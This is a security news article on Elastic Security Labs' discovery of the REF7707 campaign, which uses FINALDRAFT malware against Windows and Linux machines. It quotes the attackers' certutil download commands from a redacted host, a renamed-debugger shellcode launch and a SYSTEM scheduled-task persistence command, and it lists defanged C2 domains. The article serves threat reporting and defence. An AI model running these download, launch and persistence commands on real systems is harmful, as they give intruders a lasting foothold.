Cyber Security News

REF7707 Hackers Attacking Windows & Linux Machines Using FINALDRAFT Malware

A sophisticated hacking campaign has been unveiled recently by Elastic Security Labs, dubbed “REF7707,” which has been targeting both Windows and Linux systems using novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER.

This campaign has been notable for its advanced tactics and poor operational security, leading to the exposure of additional adversary-owned infrastructure.

The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country.

The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence.

While the security experts at Elastic Security Labs noted that despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.

Execution Flow

The primary execution chain began with the use of Microsoft’s certutil application to download files from a remote server. This involved commands like:-

certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData

These files were downloaded using Windows Remote Management’s Remote Shell plugin (WinrsHost.exe), indicating that attackers had valid network credentials for lateral movement.

Diamond Model Representation (Source – Elastic)

FINALDRAFT is a key component of the REF7707 intrusion set. It has both Windows and Linux variants and uses an uncommon LOLBin (Living Off The Land Binary) tactic by abusing the Windows-signed debugger CDB.exe, renamed as fontdrvhost.exe.

This binary executes malicious shellcode delivered via a weaponized config.ini file.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData
Behavioral Rules Acceleration (Source – Elastic)

FINALDRAFT injects shellcode into processes like mspaint.exe or conhost.exe if no target parameter is provided.

Persistence was achieved using a Scheduled Task that invoked fontdrvhost.exe every minute as SYSTEM:-

schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM

FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection.

REF7707 timeline (Source – Elastic)

The campaign heavily utilizes cloud and third-party services for command and control. Domains like support.vmphere[.]com and update.hobiter[.]com were identified in the malware samples.

These domains are part of the adversary-owned infrastructure. In REF7707 campaign the attackers leverage novel malware and exploit legitimate tools to evade detection.

The use of FINALDRAFT across both Windows and Linux platforms shows the need for robust cross-platform security measures.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

CISA Warns of Hackers Actively Exploiting Windows Server Update Services RCE Vulnerability in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned organizations worldwide about active exploitation…

2 hours ago

New Malware Attack Using Variable Functions and Cookies to Evade and Hide Their Malicious Scripts

A sophisticated malware campaign targeting WordPress sites has emerged, utilizing PHP variable functions and cookie-based…

4 hours ago

Threat Actors Tricks Target Users Via Impersonation and Fictional Financial Aid Offers

An international ecosystem of sophisticated scam operations has emerged, targeting vulnerable populations through impersonation tactics…

5 hours ago

TransparentTribe Attack Linux-Based Systems of Indian Military Organizations to Deliver DeskRAT

TransparentTribe, a Pakistani-nexus intrusion set active since at least 2013, has intensified its cyber espionage…

8 hours ago

Jingle Thief Attackers Exploiting Festive Season with Weaponized Gift Card Attacks

As the festive season approaches, organizations are witnessing a disturbing increase in targeted attacks on…

9 hours ago

Warlock Ransomware Actors Exploiting Sharepoint ToolShell Zero-Day Vulnerability in New Attack Wave

The cybersecurity landscape experienced a significant shift in July 2025 when threat actors associated with…

11 hours ago